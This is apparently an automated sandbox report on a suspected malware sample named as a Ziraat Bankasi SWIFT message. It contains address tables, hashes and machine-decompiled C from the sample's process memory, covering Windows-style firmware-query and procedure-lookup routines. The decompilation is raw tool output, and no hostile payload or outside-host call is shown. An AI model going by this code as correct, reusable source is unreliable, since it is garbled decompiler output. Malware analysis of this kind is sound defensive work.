                                                                    0x0195e79f
                                                                    0x0195e7aa
                                                                    0x0195e7c0
                                                                    0x0195e7ac
                                                                    0x0195e7b2
                                                                    0x0195e7b9
                                                                    0x0195e7b9
                                                                    0x0195e7c7
                                                                    0x0195e806
                                                                    0x00000000
                                                                    0x0195e7c9
                                                                    0x0195e7d1
                                                                    0x0195e7d8
                                                                    0x00000000
                                                                    0x0195e7d8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0195e722
                                                                    0x0195e72e
                                                                    0x0195e748
                                                                    0x0195e74c
                                                                    0x0195e754
                                                                    0x0195e756
                                                                    0x0195e75c
                                                                    0x0195e75c
                                                                    0x00000000
                                                                    0x0195e75c
                                                                    0x0195e758
                                                                    0x0195e758
                                                                    0x00000000
                                                                    0x0195e758
                                                                    0x0195e750
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0195e752
                                                                    0x00000000
                                                                    0x0195e752
                                                                    0x0195e730
                                                                    0x0195e735
                                                                    0x0195e73d
                                                                    0x0195e73f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0195e741
                                                                    0x0195e741
                                                                    0x00000000
                                                                    0x0195e741
                                                                    0x0195e739
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0195e73b
                                                                    0x00000000
                                                                    0x0195e73b
                                                                    0x0195e722
                                                                    0x0195e720
                                                                    0x0195e6b0
                                                                    0x0195e618
                                                                    0x00000000
                                                                    0x0195e618

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `$`
                                                                    • API String ID: 0-197956300
                                                                    • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                    • Instruction ID: 05dd41b8ed577af8b5584a9be9a998602f2c90e770a24d944b3154d97e6e957b
                                                                    • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                    • Instruction Fuzzy Hash: 4B91AF712043429FE764CE29C840B1BBBE9AF84714F14892DFA99DB280E771EA04CB52
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 77%
                                                                    			E019151BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                    				signed short* _t63;
                                                                    				signed int _t64;
                                                                    				signed int _t65;
                                                                    				signed int _t67;
                                                                    				intOrPtr _t74;
                                                                    				intOrPtr _t84;
                                                                    				intOrPtr _t88;
                                                                    				intOrPtr _t94;
                                                                    				void* _t100;
                                                                    				void* _t103;
                                                                    				intOrPtr _t105;
                                                                    				signed int _t106;
                                                                    				short* _t108;
                                                                    				signed int _t110;
                                                                    				signed int _t113;
                                                                    				signed int* _t115;
                                                                    				signed short* _t117;
                                                                    				void* _t118;
                                                                    				void* _t119;
                                                                    
                                                                    				_push(0x80);
                                                                    				_push(0x19705f0);
                                                                    				E018ED0E8(__ebx, __edi, __esi);
                                                                    				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                                    				_t115 =  *(_t118 + 0xc);
                                                                    				 *(_t118 - 0x7c) = _t115;
                                                                    				 *((char*)(_t118 - 0x65)) = 0;
                                                                    				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                    				_t113 = 0;
                                                                    				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                                    				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                                    				_t100 = __ecx;
                                                                    				if(_t100 == 0) {
                                                                    					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                    					E018AEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                    					 *((char*)(_t118 - 0x65)) = 1;
                                                                    					_t63 =  *(_t118 - 0x90);
                                                                    					_t101 = _t63[2];
                                                                    					_t64 =  *_t63 & 0x0000ffff;
                                                                    					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                    					L20:
                                                                    					_t65 = _t64 >> 1;
                                                                    					L21:
                                                                    					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                                    					if(_t108 == 0) {
                                                                    						L27:
                                                                    						 *_t115 = _t65 + 1;
                                                                    						_t67 = 0xc0000023;
                                                                    						L28:
                                                                    						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                                    						L29:
                                                                    						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                                    						E019153CA(0);
                                                                    						return E018ED130(0, _t113, _t115);
                                                                    					}
                                                                    					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                                    						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                                    							 *_t108 = 0;
                                                                    						}
                                                                    						goto L27;
                                                                    					}
                                                                    					 *_t115 = _t65;
                                                                    					_t115 = _t65 + _t65;
                                                                    					E018DF3E0(_t108, _t101, _t115);
                                                                    					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                                    					_t67 = 0;
                                                                    					goto L28;
                                                                    				}
                                                                    				_t103 = _t100 - 1;
                                                                    				if(_t103 == 0) {
                                                                    					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                                    					_t74 = E018B3690(1, _t117, 0x1871810, _t118 - 0x74);
                                                                    					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                                    					_t101 = _t117[2];
                                                                    					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                    					if(_t74 < 0) {
                                                                    						_t64 =  *_t117 & 0x0000ffff;
                                                                    						_t115 =  *(_t118 - 0x7c);
                                                                    						goto L20;
                                                                    					}
                                                                    					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                                    					_t115 =  *(_t118 - 0x7c);
                                                                    					goto L21;
                                                                    				}
                                                                    				if(_t103 == 1) {
                                                                    					_t105 = 4;
                                                                    					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                                    					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                                    					_push(_t118 - 0x70);
                                                                    					_push(0);
                                                                    					_push(0);
                                                                    					_push(_t105);
                                                                    					_push(_t118 - 0x78);
                                                                    					_push(0x6b);
                                                                    					 *((intOrPtr*)(_t118 - 0x64)) = E018DAA90();
                                                                    					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                    					_t113 = L018B4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                                    					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                                    					if(_t113 != 0) {
                                                                    						_push(_t118 - 0x70);
                                                                    						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                                    						_push(_t113);
                                                                    						_push(4);
                                                                    						_push(_t118 - 0x78);
                                                                    						_push(0x6b);
                                                                    						_t84 = E018DAA90();
                                                                    						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                                    						if(_t84 < 0) {
                                                                    							goto L29;
                                                                    						}
                                                                    						_t110 = 0;
                                                                    						_t106 = 0;
                                                                    						while(1) {
                                                                    							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                                    							 *(_t118 - 0x88) = _t106;
                                                                    							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                                    								break;
                                                                    							}
                                                                    							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                                    							_t106 = _t106 + 1;
                                                                    						}
                                                                    						_t88 = E0191500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                                    						_t119 = _t119 + 0x1c;
                                                                    						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                                    						if(_t88 < 0) {
                                                                    							goto L29;
                                                                    						}
                                                                    						_t101 = _t118 - 0x3c;
                                                                    						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                                    						goto L21;
                                                                    					}
                                                                    					_t67 = 0xc0000017;
                                                                    					goto L28;
                                                                    				}
                                                                    				_push(0);
                                                                    				_push(0x20);
                                                                    				_push(_t118 - 0x60);
                                                                    				_push(0x5a);
                                                                    				_t94 = E018D9860();
                                                                    				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                                    				if(_t94 < 0) {
                                                                    					goto L29;
                                                                    				}
                                                                    				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                                    					_t101 = L"Legacy";
                                                                    					_push(6);
                                                                    				} else {
                                                                    					_t101 = L"UEFI";
                                                                    					_push(4);
                                                                    				}
                                                                    				_pop(_t65);
                                                                    				goto L21;
                                                                    			}






















                                                                    0x019151be
                                                                    0x019151c3
                                                                    0x019151c8
                                                                    0x019151cd
                                                                    0x019151d0
                                                                    0x019151d3
                                                                    0x019151d8
                                                                    0x019151db
                                                                    0x019151de
                                                                    0x019151e0
                                                                    0x019151e3
                                                                    0x019151e6
                                                                    0x019151e8
                                                                    0x01915342
                                                                    0x01915351
                                                                    0x01915356
                                                                    0x0191535a
                                                                    0x01915360
                                                                    0x01915363
                                                                    0x01915366
                                                                    0x01915369
                                                                    0x01915369
                                                                    0x0191536b
                                                                    0x0191536b
                                                                    0x01915370
                                                                    0x019153a3
                                                                    0x019153a4
                                                                    0x019153a6
                                                                    0x019153ab
                                                                    0x019153ab
                                                                    0x019153ae
                                                                    0x019153ae
                                                                    0x019153b5
                                                                    0x019153bf
                                                                    0x019153bf
                                                                    0x01915375
                                                                    0x01915396
                                                                    0x019153a0
                                                                    0x019153a0
                                                                    0x00000000
                                                                    0x01915396
                                                                    0x01915377
                                                                    0x01915379
                                                                    0x0191537f
                                                                    0x0191538c
                                                                    0x01915390
                                                                    0x00000000
                                                                    0x01915390
                                                                    0x019151ee
                                                                    0x019151f1
                                                                    0x01915301
                                                                    0x01915310
                                                                    0x01915315
                                                                    0x01915318
                                                                    0x0191531b
                                                                    0x01915320
                                                                    0x0191532e
                                                                    0x01915331
                                                                    0x00000000
                                                                    0x01915331
                                                                    0x01915328
                                                                    0x01915329
                                                                    0x00000000
                                                                    0x01915329
                                                                    0x019151fa
                                                                    0x01915235
                                                                    0x01915236
                                                                    0x01915239
                                                                    0x0191523f
                                                                    0x01915240
                                                                    0x01915241
                                                                    0x01915242
                                                                    0x01915246
                                                                    0x01915247
                                                                    0x0191524e
                                                                    0x01915251
                                                                    0x01915267
                                                                    0x01915269
                                                                    0x0191526e
                                                                    0x0191527d
                                                                    0x0191527e
                                                                    0x01915281
                                                                    0x01915282
                                                                    0x01915287
                                                                    0x01915288
                                                                    0x0191528a
                                                                    0x0191528f
                                                                    0x01915294
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0191529a
                                                                    0x0191529c
                                                                    0x0191529e
                                                                    0x0191529e
                                                                    0x019152a4
                                                                    0x019152b0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x019152ba
                                                                    0x019152bc
                                                                    0x019152bc
                                                                    0x019152d4
                                                                    0x019152d9
                                                                    0x019152dc
                                                                    0x019152e1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x019152e7
                                                                    0x019152f4
                                                                    0x00000000
                                                                    0x019152f4
                                                                    0x01915270
                                                                    0x00000000
                                                                    0x01915270
                                                                    0x019151fc
                                                                    0x019151fd
                                                                    0x01915202
                                                                    0x01915203
                                                                    0x01915205
                                                                    0x0191520a
                                                                    0x0191520f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0191521b
                                                                    0x01915226
                                                                    0x0191522b
                                                                    0x0191521d
                                                                    0x0191521d
                                                                    0x01915222
                                                                    0x01915222
                                                                    0x0191522d
                                                                    0x00000000

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID: Legacy$UEFI
                                                                    • API String ID: 2994545307-634100481
                                                                    • Opcode ID: df4f2ec883ff30147c9f9a4a448beba8f46c0d0cc29d591958b4daaa84ec072f
                                                                    • Instruction ID: cb63c461c44a867cd0bd6994ccb18b0006c9f16bf93bd85cc6fb0ca09a0d456f
                                                                    • Opcode Fuzzy Hash: df4f2ec883ff30147c9f9a4a448beba8f46c0d0cc29d591958b4daaa84ec072f
                                                                    • Instruction Fuzzy Hash: F1517E71E00609DFEB25DFA8C880AADBBF8FF89700F16442DE609EB255D7719A41CB10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 87%
                                                                    			E018AD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                                                                    				signed int _v8;
                                                                    				intOrPtr _v20;
                                                                    				signed int _v36;
                                                                    				intOrPtr* _v40;
                                                                    				signed int _v44;
                                                                    				signed int _v48;
                                                                    				signed char _v52;
                                                                    				signed int _v60;
                                                                    				signed int _v64;
                                                                    				signed int _v68;
                                                                    				signed int _v72;
                                                                    				signed int _v76;
                                                                    				intOrPtr _v80;
                                                                    				signed int _v84;
                                                                    				intOrPtr _v100;
                                                                    				intOrPtr _v104;
                                                                    				signed int _v108;
                                                                    				signed int _v112;
                                                                    				signed int _v116;
                                                                    				intOrPtr _v120;
                                                                    				signed int _v132;
                                                                    				char _v140;
                                                                    				char _v144;
                                                                    				char _v157;
                                                                    				signed int _v164;
                                                                    				signed int _v168;
                                                                    				signed int _v169;
                                                                    				intOrPtr _v176;
                                                                    				signed int _v180;
                                                                    				signed int _v184;
                                                                    				intOrPtr _v188;
                                                                    				signed int _v192;
                                                                    				signed int _v200;
                                                                    				signed int _v208;
                                                                    				intOrPtr* _v212;
                                                                    				char _v216;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				signed int _t204;
                                                                    				signed int _t206;
                                                                    				void* _t208;
                                                                    				signed int _t211;
                                                                    				signed int _t216;
                                                                    				intOrPtr _t217;
                                                                    				intOrPtr* _t218;
                                                                    				signed int _t226;
                                                                    				signed int _t239;
                                                                    				signed int* _t247;
                                                                    				signed int _t249;
                                                                    				void* _t252;
                                                                    				signed int _t256;
                                                                    				signed int _t269;
                                                                    				signed int _t271;
                                                                    				signed int _t277;
                                                                    				signed int _t279;
                                                                    				intOrPtr _t283;
                                                                    				signed int _t287;
                                                                    				signed int _t288;
                                                                    				void* _t289;
                                                                    				signed char _t290;
                                                                    				signed int _t292;
                                                                    				signed int* _t293;
                                                                    				unsigned int _t297;
                                                                    				signed int _t306;
                                                                    				signed int _t307;
                                                                    				signed int _t308;
                                                                    				signed int _t309;
                                                                    				signed int _t310;
                                                                    				intOrPtr _t311;
                                                                    				intOrPtr _t312;
                                                                    				signed int _t319;
                                                                    				signed int _t320;
                                                                    				signed int* _t324;
                                                                    				signed int _t337;
                                                                    				signed int _t338;
                                                                    				signed int _t339;
                                                                    				signed int* _t340;
                                                                    				void* _t341;
                                                                    				signed int _t344;
                                                                    				signed int _t348;
                                                                    				signed int _t349;
                                                                    				signed int _t351;
                                                                    				intOrPtr _t353;
                                                                    				void* _t354;
                                                                    				signed int _t356;
                                                                    				signed int _t358;
                                                                    				intOrPtr _t359;
                                                                    				signed int _t361;
                                                                    				signed int _t363;
                                                                    				signed short* _t365;
                                                                    				void* _t367;
                                                                    				intOrPtr _t369;
                                                                    				void* _t370;
                                                                    				signed int _t371;
                                                                    				signed int _t372;
                                                                    				void* _t374;
                                                                    				signed int _t376;
                                                                    				void* _t384;
                                                                    				signed int _t387;
                                                                    
                                                                    				_v8 =  *0x198d360 ^ _t376;
                                                                    				_t2 =  &_a20;
                                                                    				 *_t2 = _a20 & 0x00000001;
                                                                    				_t287 = _a4;
                                                                    				_v200 = _a12;
                                                                    				_t365 = _a8;
                                                                    				_v212 = _a16;
                                                                    				_v180 = _a24;
                                                                    				_v168 = 0;
                                                                    				_v157 = 0;
                                                                    				if( *_t2 != 0) {
                                                                    					__eflags = E018A6600(0x19852d8);
                                                                    					if(__eflags == 0) {
                                                                    						goto L1;
                                                                    					} else {
                                                                    						_v188 = 6;
                                                                    					}
                                                                    				} else {
                                                                    					L1:
                                                                    					_v188 = 9;
                                                                    				}
                                                                    				if(_t365 == 0) {
                                                                    					_v164 = 0;
                                                                    					goto L5;
                                                                    				} else {
                                                                    					_t363 =  *_t365 & 0x0000ffff;
                                                                    					_t341 = _t363 + 1;
                                                                    					if((_t365[1] & 0x0000ffff) < _t341) {
                                                                    						L109:
                                                                    						__eflags = _t341 - 0x80;
                                                                    						if(_t341 <= 0x80) {
                                                                    							_t281 =  &_v140;
                                                                    							_v164 =  &_v140;
                                                                    							goto L114;
                                                                    						} else {
                                                                    							_t283 =  *0x1987b9c; // 0x0
                                                                    							_t281 = L018B4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                                                                    							_v164 = _t281;
                                                                    							__eflags = _t281;
                                                                    							if(_t281 != 0) {
                                                                    								_v157 = 1;
                                                                    								L114:
                                                                    								E018DF3E0(_t281, _t365[2], _t363);
                                                                    								_t200 = _v164;
                                                                    								 *((char*)(_v164 + _t363)) = 0;
                                                                    								goto L5;
                                                                    							} else {
                                                                    								_t204 = 0xc000009a;
                                                                    								goto L47;
                                                                    							}
                                                                    						}
                                                                    					} else {
                                                                    						_t200 = _t365[2];
                                                                    						_v164 = _t200;
                                                                    						if( *((char*)(_t200 + _t363)) != 0) {
                                                                    							goto L109;
                                                                    						} else {
                                                                    							while(1) {
                                                                    								L5:
                                                                    								_t353 = 0;
                                                                    								_t342 = 0x1000;
                                                                    								_v176 = 0;
                                                                    								if(_t287 == 0) {
                                                                    									break;
                                                                    								}
                                                                    								_t384 = _t287 -  *0x1987b90; // 0x77cd0000
                                                                    								if(_t384 == 0) {
                                                                    									_t353 =  *0x1987b8c; // 0x1442b88
                                                                    									_v176 = _t353;
                                                                    									_t320 = ( *(_t353 + 0x50))[8];
                                                                    									_v184 = _t320;
                                                                    								} else {
                                                                    									E018B2280(_t200, 0x19884d8);
                                                                    									_t277 =  *0x19885f4; // 0x1443078
                                                                    									_t351 =  *0x19885f8 & 1;
                                                                    									while(_t277 != 0) {
                                                                    										_t337 =  *(_t277 - 0x50);
                                                                    										if(_t337 > _t287) {
                                                                    											_t338 = _t337 | 0xffffffff;
                                                                    										} else {
                                                                    											asm("sbb ecx, ecx");
                                                                    											_t338 =  ~_t337;
                                                                    										}
                                                                    										_t387 = _t338;
                                                                    										if(_t387 < 0) {
                                                                    											_t339 =  *_t277;
                                                                    											__eflags = _t351;
                                                                    											if(_t351 != 0) {
                                                                    												__eflags = _t339;
                                                                    												if(_t339 == 0) {
                                                                    													goto L16;
                                                                    												} else {
                                                                    													goto L118;
                                                                    												}
                                                                    												goto L151;
                                                                    											} else {
                                                                    												goto L16;
                                                                    											}
                                                                    											goto L17;
                                                                    										} else {
                                                                    											if(_t387 <= 0) {
                                                                    												__eflags = _t277;
                                                                    												if(_t277 != 0) {
                                                                    													_t340 =  *(_t277 - 0x18);
                                                                    													_t24 = _t277 - 0x68; // 0x1443010
                                                                    													_t353 = _t24;
                                                                    													_v176 = _t353;
                                                                    													__eflags = _t340[3] - 0xffffffff;
                                                                    													if(_t340[3] != 0xffffffff) {
                                                                    														_t279 =  *_t340;
                                                                    														__eflags =  *(_t279 - 0x20) & 0x00000020;
                                                                    														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                                                                    															asm("lock inc dword [edi+0x9c]");
                                                                    															_t340 =  *(_t353 + 0x50);
                                                                    														}
                                                                    													}
                                                                    													_v184 = _t340[8];
                                                                    												}
                                                                    											} else {
                                                                    												_t339 =  *(_t277 + 4);
                                                                    												if(_t351 != 0) {
                                                                    													__eflags = _t339;
                                                                    													if(_t339 == 0) {
                                                                    														goto L16;
                                                                    													} else {
                                                                    														L118:
                                                                    														_t277 = _t277 ^ _t339;
                                                                    														goto L17;
                                                                    													}
                                                                    													goto L151;
                                                                    												} else {
                                                                    													L16:
                                                                    													_t277 = _t339;
                                                                    												}
                                                                    												goto L17;
                                                                    											}
                                                                    										}
                                                                    										goto L25;
                                                                    										L17:
                                                                    									}
                                                                    									L25:
                                                                    									E018AFFB0(_t287, _t353, 0x19884d8);
                                                                    									_t320 = _v184;
                                                                    									_t342 = 0x1000;
                                                                    								}
                                                                    								if(_t353 == 0) {
                                                                    									break;
                                                                    								} else {
                                                                    									_t366 = 0;
                                                                    									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                                                                    										_t288 = _v164;
                                                                    										if(_t353 != 0) {
                                                                    											_t342 = _t288;
                                                                    											_t374 = E018ECC99(_t353, _t288, _v200, 1,  &_v168);
                                                                    											if(_t374 >= 0) {
                                                                    												if(_v184 == 7) {
                                                                    													__eflags = _a20;
                                                                    													if(__eflags == 0) {
                                                                    														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                                                                    														if(__eflags != 0) {
                                                                    															_t271 = E018A6600(0x19852d8);
                                                                    															__eflags = _t271;
                                                                    															if(__eflags == 0) {
                                                                    																_t342 = 0;
                                                                    																_v169 = _t271;
                                                                    																_t374 = E018A7926( *(_t353 + 0x50), 0,  &_v169);
                                                                    															}
                                                                    														}
                                                                    													}
                                                                    												}
                                                                    												if(_t374 < 0) {
                                                                    													_v168 = 0;
                                                                    												} else {
                                                                    													if( *0x198b239 != 0) {
                                                                    														_t342 =  *(_t353 + 0x18);
                                                                    														E0191E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                                                                    													}
                                                                    													if( *0x1988472 != 0) {
                                                                    														_v192 = 0;
                                                                    														_t342 =  *0x7ffe0330;
                                                                    														_t361 =  *0x198b218; // 0x0
                                                                    														asm("ror edi, cl");
                                                                    														 *0x198b1e0( &_v192, _t353, _v168, 0, _v180);
                                                                    														 *(_t361 ^  *0x7ffe0330)();
                                                                    														_t269 = _v192;
                                                                    														_t353 = _v176;
                                                                    														__eflags = _t269;
                                                                    														if(__eflags != 0) {
                                                                    															_v168 = _t269;
                                                                    														}
                                                                    													}
                                                                    												}
                                                                    											}
                                                                    											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                                                                    												_t366 = 0xc000007a;
                                                                    											}
                                                                    											_t247 =  *(_t353 + 0x50);
                                                                    											if(_t247[3] == 0xffffffff) {
                                                                    												L40:
                                                                    												if(_t366 == 0xc000007a) {
                                                                    													__eflags = _t288;
                                                                    													if(_t288 == 0) {
                                                                    														goto L136;
                                                                    													} else {
                                                                    														_t366 = 0xc0000139;
                                                                    													}
                                                                    													goto L54;
                                                                    												}
                                                                    											} else {
                                                                    												_t249 =  *_t247;
                                                                    												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                                                                    													goto L40;
                                                                    												} else {
                                                                    													_t250 = _t249 | 0xffffffff;
                                                                    													asm("lock xadd [edi+0x9c], eax");
                                                                    													if((_t249 | 0xffffffff) == 0) {
                                                                    														E018B2280(_t250, 0x19884d8);
                                                                    														_t342 =  *(_t353 + 0x54);
                                                                    														_t165 = _t353 + 0x54; // 0x54
                                                                    														_t252 = _t165;
                                                                    														__eflags =  *(_t342 + 4) - _t252;
                                                                    														if( *(_t342 + 4) != _t252) {
                                                                    															L135:
                                                                    															asm("int 0x29");
                                                                    															L136:
                                                                    															_t288 = _v200;
                                                                    															_t366 = 0xc0000138;
                                                                    															L54:
                                                                    															_t342 = _t288;
                                                                    															L018D3898(0, _t288, _t366);
                                                                    														} else {
                                                                    															_t324 =  *(_t252 + 4);
                                                                    															__eflags =  *_t324 - _t252;
                                                                    															if( *_t324 != _t252) {
                                                                    																goto L135;
                                                                    															} else {
                                                                    																 *_t324 = _t342;
                                                                    																 *(_t342 + 4) = _t324;
                                                                    																_t293 =  *(_t353 + 0x50);
                                                                    																_v180 =  *_t293;
                                                                    																E018AFFB0(_t293, _t353, 0x19884d8);
                                                                    																__eflags =  *((short*)(_t353 + 0x3a));
                                                                    																if( *((short*)(_t353 + 0x3a)) != 0) {
                                                                    																	_t342 = 0;
                                                                    																	__eflags = 0;
                                                                    																	E018D37F5(_t353, 0);
                                                                    																}
                                                                    																E018D0413(_t353);
                                                                    																_t256 =  *(_t353 + 0x48);
                                                                    																__eflags = _t256;
                                                                    																if(_t256 != 0) {
                                                                    																	__eflags = _t256 - 0xffffffff;
                                                                    																	if(_t256 != 0xffffffff) {
                                                                    																		E018C9B10(_t256);
                                                                    																	}
                                                                    																}
                                                                    																__eflags =  *(_t353 + 0x28);
                                                                    																if( *(_t353 + 0x28) != 0) {
                                                                    																	_t174 = _t353 + 0x24; // 0x24
                                                                    																	E018C02D6(_t174);
                                                                    																}
                                                                    																L018B77F0( *0x1987b98, 0, _t353);
                                                                    																__eflags = _v180 - _t293;
                                                                    																if(__eflags == 0) {
                                                                    																	E018CC277(_t293, _t366);
                                                                    																}
                                                                    																_t288 = _v164;
                                                                    																goto L40;
                                                                    															}
                                                                    														}
                                                                    													} else {
                                                                    														goto L40;
                                                                    													}
                                                                    												}
                                                                    											}
                                                                    										}
                                                                    									} else {
                                                                    										L018AEC7F(_t353);
                                                                    										L018C19B8(_t287, 0, _t353, 0);
                                                                    										_t200 = E0189F4E3(__eflags);
                                                                    										continue;
                                                                    									}
                                                                    								}
                                                                    								L41:
                                                                    								if(_v157 != 0) {
                                                                    									L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                                                                    								}
                                                                    								if(_t366 < 0) {
                                                                    									L46:
                                                                    									 *_v212 = _v168;
                                                                    									_t204 = _t366;
                                                                    									L47:
                                                                    									_pop(_t354);
                                                                    									_pop(_t367);
                                                                    									_pop(_t289);
                                                                    									return E018DB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                                                                    								} else {
                                                                    									_t206 =  *0x198b2f8; // 0x0
                                                                    									if((_t206 |  *0x198b2fc) == 0 || ( *0x198b2e4 & 0x00000001) != 0) {
                                                                    										goto L46;
                                                                    									} else {
                                                                    										_t297 =  *0x198b2ec; // 0x0
                                                                    										_v200 = 0;
                                                                    										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
                                                                    											_t355 = _v168;
                                                                    											_t342 =  &_v208;
                                                                    											_t208 = E01946B68(_v168,  &_v208, _v168, __eflags);
                                                                    											__eflags = _t208 - 1;
                                                                    											if(_t208 == 1) {
                                                                    												goto L46;
                                                                    											} else {
                                                                    												__eflags = _v208 & 0x00000010;
                                                                    												if((_v208 & 0x00000010) == 0) {
                                                                    													goto L46;
                                                                    												} else {
                                                                    													_t342 = 4;
                                                                    													_t366 = E01946AEB(_t355, 4,  &_v216);
                                                                    													__eflags = _t366;
                                                                    													if(_t366 >= 0) {
                                                                    														goto L46;
                                                                    													} else {
                                                                    														asm("int 0x29");
                                                                    														_t356 = 0;
                                                                    														_v44 = 0;
                                                                    														_t290 = _v52;
                                                                    														__eflags = 0;
                                                                    														if(0 == 0) {
                                                                    															L108:
                                                                    															_t356 = 0;
                                                                    															_v44 = 0;
                                                                    															goto L63;
                                                                    														} else {
                                                                    															__eflags = 0;
                                                                    															if(0 < 0) {
                                                                    																goto L108;
                                                                    															}
                                                                    															L63:
                                                                    															_v112 = _t356;
                                                                    															__eflags = _t356;
                                                                    															if(_t356 == 0) {
                                                                    																L143:
                                                                    																_v8 = 0xfffffffe;
                                                                    																_t211 = 0xc0000089;
                                                                    															} else {
                                                                    																_v36 = 0;
                                                                    																_v60 = 0;
                                                                    																_v48 = 0;
                                                                    																_v68 = 0;
                                                                    																_v44 = _t290 & 0xfffffffc;
                                                                    																E018AE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                                                                    																_t306 = _v68;
                                                                    																__eflags = _t306;
                                                                    																if(_t306 == 0) {
                                                                    																	_t216 = 0xc000007b;
                                                                    																	_v36 = 0xc000007b;
                                                                    																	_t307 = _v60;
                                                                    																} else {
                                                                    																	__eflags = _t290 & 0x00000001;
                                                                    																	if(__eflags == 0) {
                                                                    																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                                                                    																		__eflags = _t349 - 0x10b;
                                                                    																		if(_t349 != 0x10b) {
                                                                    																			__eflags = _t349 - 0x20b;
                                                                    																			if(_t349 == 0x20b) {
                                                                    																				goto L102;
                                                                    																			} else {
                                                                    																				_t307 = 0;
                                                                    																				_v48 = 0;
                                                                    																				_t216 = 0xc000007b;
                                                                    																				_v36 = 0xc000007b;
                                                                    																				goto L71;
                                                                    																			}
                                                                    																		} else {
                                                                    																			L102:
                                                                    																			_t307 =  *(_t306 + 0x50);
                                                                    																			goto L69;
                                                                    																		}
                                                                    																		goto L151;
                                                                    																	} else {
                                                                    																		_t239 = L018AEAEA(_t290, _t290, _t356, _t366, __eflags);
